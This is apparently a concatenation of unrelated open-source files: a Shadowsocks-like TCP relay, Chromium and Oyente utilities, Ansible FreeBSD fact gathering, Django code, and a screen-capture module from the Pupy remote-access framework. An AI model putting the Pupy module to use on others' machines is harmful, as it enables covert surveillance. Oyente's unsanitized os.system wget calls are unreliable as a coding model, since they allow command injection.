remote_sock = socket.socket(af, socktype, proto)
self._remote_sock = remote_sock
self._fd_to_handlers[remote_sock.fileno()] = self
remote_sock.setblocking(False)
remote_sock.setsockopt(socket.SOL_TCP, socket.TCP_NODELAY, 1)
return remote_sock
def _handle_dns_resolved(self, result, error):
if error:
self._log_error(error)
self.destroy()
return
if result:
ip = result[1]
if ip:
try:
self._stage = STAGE_CONNECTING
remote_addr = ip
if self._is_local:
remote_port = self._chosen_server[1]
else:
remote_port = self._remote_address[1]
if self._is_local and self._config['fast_open']:
# for fastopen:
# wait for more data to arrive and send them in one SYN
self._stage = STAGE_CONNECTING
# we don't have to wait for remote since it's not
# created
self._update_stream(STREAM_UP, WAIT_STATUS_READING)
# TODO when there is already data in this packet
else:
# else do connect
remote_sock = self._create_remote_socket(remote_addr,
remote_port)
try:
remote_sock.connect((remote_addr, remote_port))
except (OSError, IOError) as e:
if eventloop.errno_from_exception(e) == \
errno.EINPROGRESS:
pass
self._loop.add(remote_sock,
eventloop.POLL_ERR | eventloop.POLL_OUT,
self._server)
self._stage = STAGE_CONNECTING
self._update_stream(STREAM_UP, WAIT_STATUS_READWRITING)
self._update_stream(STREAM_DOWN, WAIT_STATUS_READING)
return
except Exception as e:
shell.print_exception(e)
if self._config['verbose']:
traceback.print_exc()
self.destroy()
def _on_local_read(self):
# handle all local read events and dispatch them to methods for
# each stage
if not self._local_sock:
return
is_local = self._is_local
data = None
try:
data = self._local_sock.recv(BUF_SIZE)
except (OSError, IOError) as e:
if eventloop.errno_from_exception(e) in \
(errno.ETIMEDOUT, errno.EAGAIN, errno.EWOULDBLOCK):
return
if not data:
self.destroy()
return
self._update_activity(len(data))
if not is_local:
data = self._encryptor.decrypt(data)
if not data:
return
if self._stage == STAGE_STREAM:
if self._is_local:
data = self._encryptor.encrypt(data)
self._write_to_sock(data, self._remote_sock)
return
elif is_local and self._stage == STAGE_INIT:
# TODO check auth method
self._write_to_sock(b'\x05\00', self._local_sock)
self._stage = STAGE_ADDR
return
elif self._stage == STAGE_CONNECTING:
self._handle_stage_connecting(data)
elif (is_local and self._stage == STAGE_ADDR) or \
(not is_local and self._stage == STAGE_INIT):
self._handle_stage_addr(data)
def _on_remote_read(self):
# handle all remote read events
data = None
try:
data = self._remote_sock.recv(BUF_SIZE)
except (OSError, IOError) as e:
if eventloop.errno_from_exception(e) in \
(errno.ETIMEDOUT, errno.EAGAIN, errno.EWOULDBLOCK):
return
if not data:
self.destroy()
return
self._update_activity(len(data))
if self._is_local:
data = self._encryptor.decrypt(data)
else:
data = self._encryptor.encrypt(data)
try:
self._write_to_sock(data, self._local_sock)
except Exception as e:
shell.print_exception(e)
if self._config['verbose']:
traceback.print_exc()
# TODO use logging when debug completed
self.destroy()
def _on_local_write(self):
# handle local writable event
if self._data_to_write_to_local:
data = b''.join(self._data_to_write_to_local)
self._data_to_write_to_local = []
self._write_to_sock(data, self._local_sock)
else:
self._update_stream(STREAM_DOWN, WAIT_STATUS_READING)
def _on_remote_write(self):
# handle remote writable event
self._stage = STAGE_STREAM
if self._data_to_write_to_remote:
data = b''.join(self._data_to_write_to_remote)
self._data_to_write_to_remote = []
self._write_to_sock(data, self._remote_sock)
else:
self._update_stream(STREAM_UP, WAIT_STATUS_READING)
def _on_local_error(self):
logging.debug('got local error')
if self._local_sock:
logging.error(eventloop.get_sock_error(self._local_sock))
self.destroy()
def _on_remote_error(self):
logging.debug('got remote error')
if self._remote_sock:
logging.error(eventloop.get_sock_error(self._remote_sock))
self.destroy()
def handle_event(self, sock, event):
# handle all events in this handler and dispatch them to methods
if self._stage == STAGE_DESTROYED:
logging.debug('ignore handle_event: destroyed')
return
# order is important
if sock == self._remote_sock:
if event & eventloop.POLL_ERR:
self._on_remote_error()
if self._stage == STAGE_DESTROYED:
return
if event & (eventloop.POLL_IN | eventloop.POLL_HUP):
self._on_remote_read()
if self._stage == STAGE_DESTROYED:
return
if event & eventloop.POLL_OUT:
self._on_remote_write()
elif sock == self._local_sock:
if event & eventloop.POLL_ERR:
self._on_local_error()
if self._stage == STAGE_DESTROYED:
return
if event & (eventloop.POLL_IN | eventloop.POLL_HUP):
self._on_local_read()
if self._stage == STAGE_DESTROYED:
return
if event & eventloop.POLL_OUT:
self._on_local_write()
else:
logging.warn('unknown socket')
def _log_error(self, e):
logging.error('%s when handling connection from %s:%d' %
(e, self._client_address[0], self._client_address[1]))
def destroy(self):
# destroy the handler and release any resources
# promises:
# 1. destroy won't make another destroy() call inside
# 2. destroy releases resources so it prevents future call to destroy
# 3. destroy won't raise any exceptions
# if any of the promises are broken, it indicates a bug has been
# introduced! mostly likely memory leaks, etc
if self._stage == STAGE_DESTROYED:
# this couldn't happen
logging.debug('already destroyed')
return
self._stage = STAGE_DESTROYED
if self._remote_address:
logging.debug('destroy: %s:%d' %
self._remote_address)
else:
logging.debug('destroy')
if self._remote_sock:
logging.debug('destroying remote')
self._loop.remove(self._remote_sock)
del self._fd_to_handlers[self._remote_sock.fileno()]
self._remote_sock.close()
self._remote_sock = None
if self._local_sock:
logging.debug('destroying local')
self._loop.remove(self._local_sock)
del self._fd_to_handlers[self._local_sock.fileno()]
self._local_sock.close()
self._local_sock = None
self._dns_resolver.remove_callback(self._handle_dns_resolved)
self._server.remove_handler(self)
class TCPRelay(object):
def __init__(self, config, dns_resolver, is_local, stat_callback=None):
self._config = config
self._is_local = is_local
self._dns_resolver = dns_resolver
self._closed = False
self._eventloop = None
self._fd_to_handlers = {}
self._timeout = config['timeout']
self._timeouts = [] # a list for all the handlers
# we trim the timeouts once a while
self._timeout_offset = 0 # last checked position for timeout
self._handler_to_timeouts = {} # key: handler value: index in timeouts
if is_local:
listen_addr = config['local_address']
listen_port = config['local_port']
else:
listen_addr = config['server']
listen_port = config['server_port']
self._listen_port = listen_port
addrs = socket.getaddrinfo(listen_addr, listen_port, 0,
socket.SOCK_STREAM, socket.SOL_TCP)
if len(addrs) == 0:
raise Exception("can't get addrinfo for %s:%d" %
(listen_addr, listen_port))
af, socktype, proto, canonname, sa = addrs[0]
server_socket = socket.socket(af, socktype, proto)
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server_socket.bind(sa)
server_socket.setblocking(False)
if config['fast_open']:
try:
server_socket.setsockopt(socket.SOL_TCP, 23, 5)
except socket.error:
logging.error('warning: fast open is not available')
self._config['fast_open'] = False
server_socket.listen(1024)
self._server_socket = server_socket
self._stat_callback = stat_callback
def add_to_loop(self, loop):
if self._eventloop:
raise Exception('already add to loop')
if self._closed:
raise Exception('already closed')
self._eventloop = loop
self._eventloop.add(self._server_socket,
eventloop.POLL_IN | eventloop.POLL_ERR, self)
self._eventloop.add_periodic(self.handle_periodic)
def remove_handler(self, handler):
index = self._handler_to_timeouts.get(hash(handler), -1)
if index >= 0:
# delete is O(n), so we just set it to None
self._timeouts[index] = None
del self._handler_to_timeouts[hash(handler)]
def update_activity(self, handler, data_len):
if data_len and self._stat_callback:
self._stat_callback(self._listen_port, data_len)
# set handler to active
now = int(time.time())
if now - handler.last_activity < eventloop.TIMEOUT_PRECISION:
# thus we can lower timeout modification frequency
return
handler.last_activity = now
index = self._handler_to_timeouts.get(hash(handler), -1)
if index >= 0:
# delete is O(n), so we just set it to None
self._timeouts[index] = None
length = len(self._timeouts)
self._timeouts.append(handler)
self._handler_to_timeouts[hash(handler)] = length
def _sweep_timeout(self):
# tornado's timeout memory management is more flexible than we need
# we just need a sorted last_activity queue and it's faster than heapq
# in fact we can do O(1) insertion/remove so we invent our own
if self._timeouts:
logging.log(shell.VERBOSE_LEVEL, 'sweeping timeouts')
now = time.time()
length = len(self._timeouts)
pos = self._timeout_offset
while pos < length:
handler = self._timeouts[pos]
if handler:
if now - handler.last_activity < self._timeout:
break
else:
if handler.remote_address:
logging.warn('timed out: %s:%d' %
handler.remote_address)
else:
logging.warn('timed out')
handler.destroy()
self._timeouts[pos] = None # free memory
pos += 1
else:
pos += 1
if pos > TIMEOUTS_CLEAN_SIZE and pos > length >> 1:
# clean up the timeout queue when it gets larger than half
# of the queue
self._timeouts = self._timeouts[pos:]
for key in self._handler_to_timeouts:
self._handler_to_timeouts[key] -= pos
pos = 0
self._timeout_offset = pos
def handle_event(self, sock, fd, event):
# handle events and dispatch to handlers
if sock:
logging.log(shell.VERBOSE_LEVEL, 'fd %d %s', fd,
eventloop.EVENT_NAMES.get(event, event))
if sock == self._server_socket:
if event & eventloop.POLL_ERR:
# TODO
raise Exception('server_socket error')
try:
logging.debug('accept')
conn = self._server_socket.accept()
TCPRelayHandler(self, self._fd_to_handlers,
self._eventloop, conn[0], self._config,
self._dns_resolver, self._is_local)
except (OSError, IOError) as e:
error_no = eventloop.errno_from_exception(e)
if error_no in (errno.EAGAIN, errno.EINPROGRESS,
errno.EWOULDBLOCK):
return
else:
shell.print_exception(e)
if self._config['verbose']:
traceback.print_exc()
else:
if sock:
handler = self._fd_to_handlers.get(fd, None)
if handler:
handler.handle_event(sock, event)
else:
logging.warn('poll removed fd')
def handle_periodic(self):
if self._closed:
if self._server_socket:
self._eventloop.remove(self._server_socket)
self._server_socket.close()
self._server_socket = None
logging.info('closed TCP port %d', self._listen_port)
if not self._fd_to_handlers:
logging.info('stopping')
self._eventloop.stop()
self._sweep_timeout()
def close(self, next_tick=False):
logging.debug('TCP close')
self._closed = True
if not next_tick:
if self._eventloop:
self._eventloop.remove_periodic(self.handle_periodic)
self._eventloop.remove(self._server_socket)
self._server_socket.close()
for handler in list(self._fd_to_handlers.values()):
handler.destroy()
|
AOSPU/external_chromium_org
|
refs/heads/android-5.0/py3
|
ppapi/generators/idl_tests.py
|
127
|
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
""" Test runner for IDL Generator changes """
import subprocess
import sys
def TestIDL(testname, args):
print '\nRunning unit tests for %s.' % testname
try:
args = [sys.executable, testname] + args
subprocess.check_call(args)
return 0
except subprocess.CalledProcessError as err:
print 'Failed with %s.' % str(err)
return 1
def main(args):
errors = 0
errors += TestIDL('idl_lexer.py', ['--test'])
assert errors == 0
errors += TestIDL('idl_parser.py', ['--test'])
assert errors == 0
errors += TestIDL('idl_c_header.py', [])
assert errors == 0
errors += TestIDL('idl_c_proto.py', ['--wnone', '--test'])
assert errors == 0
errors += TestIDL('idl_gen_pnacl.py', ['--wnone', '--test'])
assert errors == 0
errors += TestIDL('idl_namespace.py', [])
assert errors == 0
errors += TestIDL('idl_node.py', [])
assert errors == 0
if errors:
print '\nFailed tests.'
return errors
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
|
oyente/oyente
|
refs/heads/master
|
utils.py
|
1
|
# return true if the two paths have different flows of money
# later on we may want to return more meaningful output: e.g. if the concurrency changes
# the amount of money or the recipient.
from z3 import *
from z3util import get_vars
import json
import mmap
import os
import csv
import re
import difflib
import signal
def my_copy_dict(input):
output = {}
for key in input:
if isinstance(input[key], list):
output[key] = list(input[key])
elif isinstance(input[key], dict):
output[key] = dict(input[key])
else:
output[key] = input[key]
return output
# class Timeout():
# """Timeout class using ALARM signal."""
#
# def __init__(self, sec):
# self.sec = sec
#
# def __enter__(self):
# signal.signal(signal.SIGALRM, self.raise_timeout)
# signal.alarm(self.sec)
#
# def __exit__(self, *args):
# signal.alarm(0) # disable alarm
#
# def raise_timeout(self, *args):
# raise Exception("Timeout")
# check if a variable is a storage address in a contract
# currently accept only int addresses in the storage
def is_storage_var(var):
return isinstance(var, (int, long))
# return True
# else:
# return isinstance(var, str) and var.startswith("Ia_store_")
# copy only storage values/ variables from a given global state
# TODO: add balance in the future
def copy_global_values(global_state):
new_gstate = {}
for var in global_state["Ia"]:
if is_storage_var(var):
new_gstate[var] = global_state["Ia"][var]
return new_gstate
# check if a variable is in an expression
def is_in_expr(var, expr):
list_vars = get_vars(expr)
set_vars = set(i.decl().name() for i in list_vars)
return var in set_vars
# check if an expression has any storage variables
def has_storage_vars(expr, storage_vars):
list_vars = get_vars(expr)
for var in list_vars:
if var in storage_vars:
return True
return False
def get_all_vars(list_of_storage_exprs):
ret_vars = []
for expr in list_of_storage_exprs:
ret_vars += get_vars(list_of_storage_exprs[expr])
return ret_vars
# rename variables to distinguish variables in two different paths.
# e.g. Ia_store_0 in path i becomes Ia_store_0_old if Ia_store_0 is modified
# else we must keep Ia_store_0 if its not modified
def rename_vars(pcs, global_states):
ret_pcs = []
vars_mapping = {}
for expr in pcs:
list_vars = get_vars(expr)
for var in list_vars:
if var in vars_mapping:
expr = substitute(expr, (var, vars_mapping[var]))
continue
var_name = var.decl().name()
# check if a var is global
if var_name.startswith("Ia_store_"):
position = var_name.split('Ia_store_')[1]
# if it is not modified then keep the previous name
if position not in global_states:
continue
# otherwise, change the name of the variable
new_var_name = var_name + '_old'
new_var = BitVec(new_var_name, 256)
vars_mapping[var] = new_var
expr = substitute(expr, (var, vars_mapping[var]))
ret_pcs.append(expr)
ret_gs = {}
# replace variable in storage expression
for storage_addr in global_states:
expr = global_states[storage_addr]
# stupid z3 4.1 makes me add this line
if is_expr(expr):
list_vars = get_vars(expr)
for var in list_vars:
if var in vars_mapping:
expr = substitute(expr, (var, vars_mapping[var]))
continue
var_name = var.decl().name()
# check if a var is global
if var_name.startswith("Ia_store_"):
position = int(var_name.split('_')[len(var_name.split('_'))-1])
# if it is not modified
if position not in global_states:
continue
# otherwise, change the name of the variable
new_var_name = var_name + '_old'
new_var = BitVec(new_var_name, 256)
vars_mapping[var] = new_var
expr = substitute(expr, (var, vars_mapping[var]))
ret_gs[storage_addr] = expr
return ret_pcs, ret_gs
#split a file into smaller files
def split_dicts(filename, nsub = 500):
with open(filename) as json_file:
c = json.load(json_file)
current_file = {}
file_index = 1
for u, v in c.iteritems():
current_file[u] = v
if len(current_file) == nsub:
with open(filename.split(".")[0] + "_" + str(file_index) + '.json', 'w') as outfile:
json.dump(current_file, outfile)
file_index += 1
current_file.clear()
if len(current_file):
with open(filename.split(".")[0] + "_" + str(file_index) + '.json', 'w') as outfile:
json.dump(current_file, outfile)
current_file.clear()
def do_split_dicts():
for i in range(11):
split_dicts("contract" + str(i) + ".json")
os.remove("contract" + str(i) + ".json")
def run_re_file(re_str, fn):
size = os.stat(fn).st_size
with open(fn, 'r') as tf:
data = mmap.mmap(tf.fileno(), size, access=mmap.ACCESS_READ)
return re.findall(re_str, data)
def get_contract_info(contract_addr):
print "Getting info for contracts... " + contract_addr
file_name1 = "tmp/" + contract_addr + "_txs.html"
file_name2 = "tmp/" + contract_addr + ".html"
# get number of txs
txs = "unknown"
value = "unknown"
re_txs_value = r"<span>A total of (.+?) transactions found for address</span>"
re_str_value = r"<td>ETH Balance:\n<\/td>\n<td>\n(.+?)\n<\/td>"
try:
txs = run_re_file(re_txs_value, file_name1)
value = run_re_file(re_str_value, file_name2)
except Exception as e:
try:
os.system("wget -O %s http://etherscan.io/txs?a=%s" % (file_name1, contract_addr))
re_txs_value = r"<span>A total of (.+?) transactions found for address</span>"
txs = run_re_file(re_txs_value, file_name1)
# get balance
re_str_value = r"<td>ETH Balance:\n<\/td>\n<td>\n(.+?)\n<\/td>"
os.system("wget -O %s https://etherscan.io/address/%s" % (file_name2, contract_addr))
value = run_re_file(re_str_value, file_name2)
except Exception as e:
pass
return txs, value
def get_contract_stats(list_of_contracts):
with open("concurr.csv", "w") as stats_file:
fp = csv.writer(stats_file, delimiter=',')
fp.writerow(["Contract address", "No. of paths", "No. of concurrency pairs", "Balance", "No. of TXs", "Note"])
with open(list_of_contracts, "r") as f:
for contract in f.readlines():
contract_addr = contract.split()[0]
value, txs = get_contract_info(contract_addr)
fp.writerow([contract_addr, contract.split()[1], contract.split()[2],
value, txs, contract.split()[3:]])
def get_time_dependant_contracts(list_of_contracts):
with open("time.csv", "w") as stats_file:
fp = csv.writer(stats_file, delimiter=',')
fp.writerow(["Contract address", "Balance", "No. of TXs", "Note"])
with open(list_of_contracts, "r") as f:
for contract in f.readlines():
if len(contract.strip()) == 0:
continue
contract_addr = contract.split(".")[0].split("_")[1]
txs, value = get_contract_info(contract_addr)
fp.writerow([contract_addr, value, txs])
def get_distinct_contracts(list_of_contracts = "concurr.csv"):
flag = []
with open(list_of_contracts, "rb") as csvfile:
contracts = csvfile.readlines()[1:]
n =len(contracts)
for i in range(n):
flag.append(i) # mark which contract is similar to contract_i
for i in range(n):
if flag[i] != i:
continue
contract_i = contracts[i].split(",")[0]
npath_i = int(contracts[i].split(",")[1])
npair_i = int(contracts[i].split(",")[2])
file_i = "stats/tmp_" + contract_i + ".evm"
print " reading file " + file_i
for j in range(i+1, n):
if flag[j] != j:
continue
contract_j = contracts[j].split(",")[0]
npath_j = int(contracts[j].split(",")[1])
npair_j = int(contracts[j].split(",")[2])
if (npath_i == npath_j) and (npair_i == npair_j):
file_j = "stats/tmp_" + contract_j + ".evm"
with open(file_i, 'r') as f1, open(file_j, 'r') as f2:
code_i = f1.readlines()
code_j = f2.readlines()
if abs(len(code_i) - len(code_j)) >= 5:
continue
diff = difflib.ndiff(code_i, code_j)
ndiff = 0
for line in diff:
if line.startswith("+") or line.startswith("-"):
ndiff += 1
if ndiff < 10:
flag[j] = i
print flag
|
denisjul/democratos
|
refs/heads/master
|
democratos/CreateYourLaws/apps.py
|
1
|
from django.apps import AppConfig
class CreateyourlawsConfig(AppConfig):
name = 'CreateYourLaws'
def ready(self):
from CreateYourLaws import signals
|
chouseknecht/ansible
|
refs/heads/devel
|
lib/ansible/module_utils/facts/hardware/freebsd.py
|
101
|
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
import re
from ansible.module_utils.facts.hardware.base import Hardware, HardwareCollector
from ansible.module_utils.facts.timeout import TimeoutError, timeout
from ansible.module_utils.facts.utils import get_file_content, get_mount_size
class FreeBSDHardware(Hardware):
"""
FreeBSD-specific subclass of Hardware. Defines memory and CPU facts:
- memfree_mb
- memtotal_mb
- swapfree_mb
- swaptotal_mb
- processor (a list)
- processor_cores
- processor_count
- devices
"""
platform = 'FreeBSD'
DMESG_BOOT = '/var/run/dmesg.boot'
def populate(self, collected_facts=None):
hardware_facts = {}
cpu_facts = self.get_cpu_facts()
memory_facts = self.get_memory_facts()
dmi_facts = self.get_dmi_facts()
device_facts = self.get_device_facts()
mount_facts = {}
try:
mount_facts = self.get_mount_facts()
except TimeoutError:
pass
hardware_facts.update(cpu_facts)
hardware_facts.update(memory_facts)
hardware_facts.update(dmi_facts)
hardware_facts.update(device_facts)
hardware_facts.update(mount_facts)
return hardware_facts
def get_cpu_facts(self):
cpu_facts = {}
cpu_facts['processor'] = []
sysctl = self.module.get_bin_path('sysctl')
if sysctl:
rc, out, err = self.module.run_command("%s -n hw.ncpu" % sysctl, check_rc=False)
cpu_facts['processor_count'] = out.strip()
dmesg_boot = get_file_content(FreeBSDHardware.DMESG_BOOT)
if not dmesg_boot:
try:
rc, dmesg_boot, err = self.module.run_command(self.module.get_bin_path("dmesg"), check_rc=False)
except Exception:
dmesg_boot = ''
for line in dmesg_boot.splitlines():
if 'CPU:' in line:
cpu = re.sub(r'CPU:\s+', r"", line)
cpu_facts['processor'].append(cpu.strip())
if 'Logical CPUs per core' in line:
cpu_facts['processor_cores'] = line.split()[4]
return cpu_facts
def get_memory_facts(self):
memory_facts = {}
sysctl = self.module.get_bin_path('sysctl')
if sysctl:
rc, out, err = self.module.run_command("%s vm.stats" % sysctl, check_rc=False)
for line in out.splitlines():
data = line.split()
if 'vm.stats.vm.v_page_size' in line:
pagesize = int(data[1])
if 'vm.stats.vm.v_page_count' in line:
pagecount = int(data[1])
if 'vm.stats.vm.v_free_count' in line:
freecount = int(data[1])
memory_facts['memtotal_mb'] = pagesize * pagecount // 1024 // 1024
memory_facts['memfree_mb'] = pagesize * freecount // 1024 // 1024
swapinfo = self.module.get_bin_path('swapinfo')
if swapinfo:
# Get swapinfo. swapinfo output looks like:
# Device 1M-blocks Used Avail Capacity
# /dev/ada0p3 314368 0 314368 0%
#
rc, out, err = self.module.run_command("%s -k" % swapinfo)
lines = out.splitlines()
if len(lines[-1]) == 0:
lines.pop()
data = lines[-1].split()
if data[0] != 'Device':
memory_facts['swaptotal_mb'] = int(data[1]) // 1024
memory_facts['swapfree_mb'] = int(data[3]) // 1024
return memory_facts
@timeout()
def get_mount_facts(self):
mount_facts = {}
mount_facts['mounts'] = []
fstab = get_file_content('/etc/fstab')
if fstab:
for line in fstab.splitlines():
if line.startswith('#') or line.strip() == '':
continue
fields = re.sub(r'\s+', ' ', line).split()
mount_statvfs_info = get_mount_size(fields[1])
mount_info = {'mount': fields[1],
'device': fields[0],
'fstype': fields[2],
'options': fields[3]}
mount_info.update(mount_statvfs_info)
mount_facts['mounts'].append(mount_info)
return mount_facts
def get_device_facts(self):
device_facts = {}
sysdir = '/dev'
device_facts['devices'] = {}
drives = re.compile(r'(ada?\d+|da\d+|a?cd\d+)') # TODO: rc, disks, err = self.module.run_command("/sbin/sysctl kern.disks")
slices = re.compile(r'(ada?\d+s\d+\w*|da\d+s\d+\w*)')
if os.path.isdir(sysdir):
dirlist = sorted(os.listdir(sysdir))
for device in dirlist:
d = drives.match(device)
if d:
device_facts['devices'][d.group(1)] = []
s = slices.match(device)
if s:
device_facts['devices'][d.group(1)].append(s.group(1))
return device_facts
def get_dmi_facts(self):
''' learn dmi facts from system
Use dmidecode executable if available'''
dmi_facts = {}
# Fall back to using dmidecode, if available
dmi_bin = self.module.get_bin_path('dmidecode')
DMI_DICT = dict(
bios_date='bios-release-date',
bios_version='bios-version',
form_factor='chassis-type',
product_name='system-product-name',
product_serial='system-serial-number',
product_uuid='system-uuid',
product_version='system-version',
system_vendor='system-manufacturer'
)
for (k, v) in DMI_DICT.items():
if dmi_bin is not None:
(rc, out, err) = self.module.run_command('%s -s %s' % (dmi_bin, v))
if rc == 0:
# Strip out commented lines (specific dmidecode output)
# FIXME: why add the fact and then test if it is json?
dmi_facts[k] = ''.join([line for line in out.splitlines() if not line.startswith('#')])
try:
json.dumps(dmi_facts[k])
except UnicodeDecodeError:
dmi_facts[k] = 'NA'
else:
dmi_facts[k] = 'NA'
else:
dmi_facts[k] = 'NA'
return dmi_facts
class FreeBSDHardwareCollector(HardwareCollector):
_fact_class = FreeBSDHardware
_platform = 'FreeBSD'
|
shaheemirza/pupy
|
refs/heads/master
|
pupy/modules/screenshot.py
|
27
|
# -*- coding: UTF8 -*-
# --------------------------------------------------------------
# Copyright (c) 2015, Nicolas VERDIER ([email protected])
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE
# --------------------------------------------------------------
from pupylib.PupyModule import *
from rpyc.utils.classic import download
import os
import os.path
import textwrap
import logging
import datetime
from zlib import compress, crc32
import struct
import subprocess
__class_name__="Screenshoter"
def pil_save(filename, pixels, width, height):
from PIL import Image, ImageFile
buffer_len = (width * 3 + 3) & -4
img = Image.frombuffer('RGB', (width, height), pixels, 'raw', 'BGR', buffer_len, 1)
ImageFile.MAXBLOCK = width * height
img=img.transpose(Image.FLIP_TOP_BOTTOM)
img.save(filename, quality=95, optimize=True, progressive=True)
logging.info('Screenshot saved to %s'%filename)
class Screenshoter(PupyModule):
""" take a screenshot :) """
@windows_only
def is_compatible(self):
pass
def init_argparse(self):
self.arg_parser = PupyArgumentParser(prog='screenshot', description=self.__doc__)
self.arg_parser.add_argument('-e', '--enum', action='store_true', help='enumerate screen')
self.arg_parser.add_argument('-s', '--screen', type=int, default=None, help='take a screenshot on a specific screen (default all screen on one screenshot)')
self.arg_parser.add_argument('-v', '--view', action='store_true', help='directly open eog on the screenshot for preview')
def run(self, args):
try:
os.makedirs("./data/screenshots")
except Exception:
pass
self.client.load_package("pupwinutils.screenshot")
screens=None
if args.screen is None:
screens=self.client.conn.modules['pupwinutils.screenshot'].enum_display_monitors(oneshot=True)
else:
screens=self.client.conn.modules['pupwinutils.screenshot'].enum_display_monitors()
if args.enum:
res=""
for i, screen in enumerate(screens):
res+="{:<3}: {}\n".format(i,screen)
return res
if args.screen is None:
args.screen=0
selected_screen=screens[args.screen]
screenshot_pixels=self.client.conn.modules["pupwinutils.screenshot"].get_pixels(selected_screen)
filepath=os.path.join("./data/screenshots","scr_"+self.client.short_name()+"_"+str(datetime.datetime.now()).replace(" ","_").replace(":","-")+".jpg")
pil_save(filepath, screenshot_pixels, selected_screen["width"], selected_screen["height"])
if args.view:
subprocess.Popen(["eog",filepath])
self.success("screenshot saved to %s"%filepath)
|
sergei-maertens/django
|
refs/heads/master
|
django/db/backends/oracle/operations.py
|
3
|
from __future__ import unicode_literals
import datetime
import re
import uuid
from django.conf import settings
from django.db.backends.base.operations import BaseDatabaseOperations
from django.db.backends.utils import truncate_name
from django.utils import six, timezone
from django.utils.encoding import force_bytes, force_text
from .base import Database
from .utils import InsertIdVar, Oracle_datetime, convert_unicode
class DatabaseOperations(BaseDatabaseOperations):
compiler_module = "django.db.backends.oracle.compiler"
# Oracle uses NUMBER(11) and NUMBER(19) for integer fields.
integer_field_ranges = {
'SmallIntegerField': (-99999999999, 99999999999),
'IntegerField': (-99999999999, 99999999999),
'BigIntegerField': (-9999999999999999999, 9999999999999999999),
'PositiveSmallIntegerField': (0, 99999999999),
'PositiveIntegerField': (0, 99999999999),
}
# TODO: colorize this SQL code with style.SQL_KEYWORD(), etc.
_sequence_reset_sql = """
DECLARE
table_value integer;
seq_value integer;
BEGIN
SELECT NVL(MAX(%(column)s), 0) INTO table_value FROM %(table)s;
SELECT NVL(last_number - cache_size, 0) INTO seq_value FROM user_sequences
WHERE sequence_name = '%(sequence)s';
WHILE table_value > seq_value LOOP
SELECT "%(sequence)s".nextval INTO seq_value FROM dual;
END LOOP;
END;
/"""
def autoinc_sql(self, table, column):
# To simulate auto-incrementing primary keys in Oracle, we have to
# create a sequence and a trigger.
args = {
'sq_name': self._get_sequence_name(table),
'tr_name': self._get_trigger_name(table),
'tbl_name': self.quote_name(table),
'col_name': self.quote_name(column),
}
sequence_sql = """
DECLARE
i INTEGER;
BEGIN
SELECT COUNT(*) INTO i FROM USER_CATALOG
WHERE TABLE_NAME = '%(sq_name)s' AND TABLE_TYPE = 'SEQUENCE';
IF i = 0 THEN
EXECUTE IMMEDIATE 'CREATE SEQUENCE "%(sq_name)s"';
END IF;
END;
/""" % args
trigger_sql = """
CREATE OR REPLACE TRIGGER "%(tr_name)s"
BEFORE INSERT ON %(tbl_name)s
FOR EACH ROW
WHEN (new.%(col_name)s IS NULL)
BEGIN
SELECT "%(sq_name)s".nextval
INTO :new.%(col_name)s FROM dual;
END;
/""" % args
return sequence_sql, trigger_sql
def cache_key_culling_sql(self):
return """
SELECT cache_key
FROM (SELECT cache_key, rank() OVER (ORDER BY cache_key) AS rank FROM %s)
WHERE rank = %%s + 1
"""
def date_extract_sql(self, lookup_type, field_name):
if lookup_type == 'week_day':
# TO_CHAR(field, 'D') returns an integer from 1-7, where 1=Sunday.
return "TO_CHAR(%s, 'D')" % field_name
else:
# http://docs.oracle.com/cd/B19306_01/server.102/b14200/functions050.htm
return "EXTRACT(%s FROM %s)" % (lookup_type.upper(), field_name)
def date_interval_sql(self, timedelta):
"""
Implements the interval functionality for expressions
format for Oracle:
INTERVAL '3 00:03:20.000000' DAY(1) TO SECOND(6)
"""
minutes, seconds = divmod(timedelta.seconds, 60)
hours, minutes = divmod(minutes, 60)
days = str(timedelta.days)
day_precision = len(days)
fmt = "INTERVAL '%s %02d:%02d:%02d.%06d' DAY(%d) TO SECOND(6)"
return fmt % (days, hours, minutes, seconds, timedelta.microseconds, day_precision), []
def date_trunc_sql(self, lookup_type, field_name):
# http://docs.oracle.com/cd/B19306_01/server.102/b14200/functions230.htm#i1002084
if lookup_type in ('year', 'month'):
return "TRUNC(%s, '%s')" % (field_name, lookup_type.upper())
else:
return "TRUNC(%s)" % field_name
